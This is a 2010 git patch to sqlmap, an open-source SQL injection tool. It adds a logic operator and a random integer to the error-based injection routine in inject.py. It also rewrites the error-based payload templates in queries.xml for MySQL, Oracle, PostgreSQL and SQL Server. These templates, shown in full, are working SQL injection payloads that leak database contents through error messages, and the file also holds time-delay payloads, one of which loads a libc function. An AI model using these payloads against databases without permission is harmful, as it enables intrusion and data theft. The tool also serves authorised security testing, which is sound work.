From b032fdbf7477583d694e75ece0a13b3477ff1f11 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 20 Oct 2010 08:56:58 +0000
Subject: [PATCH] added randInt to error injection vectors

---
 lib/request/inject.py | 5 ++++-
 xml/queries.xml       | 9 ++++-----
 2 files changed, 8 insertions(+), 6 deletions(-)

diff --git a/lib/request/inject.py b/lib/request/inject.py
index fc5e1064e..713258a0b 100644
--- a/lib/request/inject.py
+++ b/lib/request/inject.py
@@ -19,6 +19,7 @@ from lib.core.common import expandAsteriskForColumns
 from lib.core.common import parseUnionPage
 from lib.core.common import popValue
 from lib.core.common import pushValue
+from lib.core.common import randomInt
 from lib.core.common import readInput
 from lib.core.common import replaceNewlineTabs
 from lib.core.common import safeStringFormat
@@ -337,6 +338,8 @@ def __goError(expression, resumeValue=True):
     Retrieve the output of a SQL query taking advantage of an error SQL
     injection vulnerability on the affected parameter.
     """
+    logic          = conf.logic
+    randInt        = randomInt(1)
     query          = agent.prefixQuery(" %s" % queries[kb.misc.testedDbms].error)
     query          = agent.postfixQuery(query)
     payload        = agent.payload(newValue=query)
@@ -362,7 +365,7 @@ def __goError(expression, resumeValue=True):
     debugMsg = "query: %s" % expressionUnescaped
     logger.debug(debugMsg)
 
-    forgedPayload = safeStringFormat(payload, expressionUnescaped)
+    forgedPayload = safeStringFormat(payload, (logic, randInt, expressionUnescaped))
     result = Request.queryPage(urlencode(forgedPayload), content=True)
 
     match = re.search(queries[kb.misc.testedDbms].errorRegex, result[0], re.DOTALL | re.IGNORECASE)
diff --git a/xml/queries.xml b/xml/queries.xml
index c0e13cfa8..ac08b36ae 100644
--- a/xml/queries.xml
+++ b/xml/queries.xml
@@ -24,7 +24,7 @@
         <timedelay query="SELECT SLEEP(%d)" query2="SELECT BENCHMARK(5000000, MD5('%d'))"/>
         <substring query="MID((%s), %d, %d)"/>
         <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
-        <error query="AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT((%s),CHAR(58),CHAR(120),CHAR(58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)" regex="SQL error:.*Duplicate entry '(?P&lt;result&gt;.+?)' for key"/>
+        <error query="%s (SELECT %s FROM(SELECT COUNT(*),CONCAT((%s),CHAR(58),CHAR(120),CHAR(58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)" regex="SQL error:.*Duplicate entry '(?P&lt;result&gt;.+?)' for key"/>
         <inference query="AND ORD(MID((%s), %d, 1)) > %d"/>
         <banner query="SELECT VERSION()"/>
         <current_user query="SELECT CURRENT_USER()"/>
@@ -91,8 +91,7 @@
         <timedelay query="BEGIN DBMS_LOCK.SLEEP(%d); END" query2="EXEC DBMS_LOCK.SLEEP(%d.00)" query3="EXEC USER_LOCK.SLEEP(%d00)"/>
         <substring query="SUBSTR((%s), %d, %d)"/>
         <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END) FROM DUAL"/>
-        <!--<error query="AND 1=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||(%s)||CHR(62))) FROM DUAL)" regex="Warning: invalid QName.*::(?P&lt;result&gt;.+?)&amp;quot;"/>-->
-        <error query="AND 1=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||CHR(62))) FROM DUAL)" regex="Warning: invalid QName.*::(?P&lt;result&gt;.+?)&amp;quot;"/>
+        <error query="%s %s=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||CHR(62))) FROM DUAL)" regex="Warning: invalid QName.*::(?P&lt;result&gt;.+?)&amp;quot;"/>
         <inference query="AND ASCII(SUBSTR((%s), %d, 1)) > %d"/>
         <banner query="SELECT banner FROM v$version WHERE ROWNUM=1"/>
         <current_user query="SELECT USER FROM DUAL"/>
@@ -176,7 +175,7 @@
         <timedelay query="SELECT PG_SLEEP(%d)" query2="SELECT 'sqlmap' WHERE exists(SELECT * FROM generate_series(1, 300000%d))" query3="CREATE OR REPLACE FUNCTION sleep(int) RETURNS int AS '/lib/libc.so.6', 'sleep' language 'C' STRICT; SELECT sleep(%d)"/>
         <substring query="SUBSTR((%s)::text, %d, %d)"/>
         <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
-        <error query="AND 1=CAST((%s)::text||CHR(58)||CHR(120)||CHR(58) AS NUMERIC)" regex="SQL error:.*invalid input syntax for type numeric:.*&quot;(?P&lt;result&gt;.+?)&quot;"/>
+        <error query="%s %s=CAST((%s)::text||CHR(58)||CHR(120)||CHR(58) AS NUMERIC)" regex="SQL error:.*invalid input syntax for type numeric:.*&quot;(?P&lt;result&gt;.+?)&quot;"/>
         <inference query="AND ASCII(SUBSTR((%s)::text, %d, 1)) > %d"/>
         <banner query="SELECT VERSION()"/>
         <current_user query="SELECT CURRENT_USER"/>
@@ -243,7 +242,7 @@
         <timedelay query="WAITFOR DELAY '0:0:%d'"/>
         <substring query="SUBSTRING((%s), %d, %d)"/>
         <case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/>
-        <error query="AND 1=CONVERT(INT,((%s)+CHAR(58)+CHAR(120)+CHAR(58)))" regex="Conversion failed when converting.*'(?P&lt;result&gt;.+?)' to data type int"/>
+        <error query="%s %s=CONVERT(INT,((%s)+CHAR(58)+CHAR(120)+CHAR(58)))" regex="Conversion failed when converting.*'(?P&lt;result&gt;.+?)' to data type int"/>
         <inference query="AND ASCII(SUBSTRING((%s), %d, 1)) > %d"/>
         <banner query="SELECT @@VERSION"/>
         <current_user query="SELECT SYSTEM_USER"/>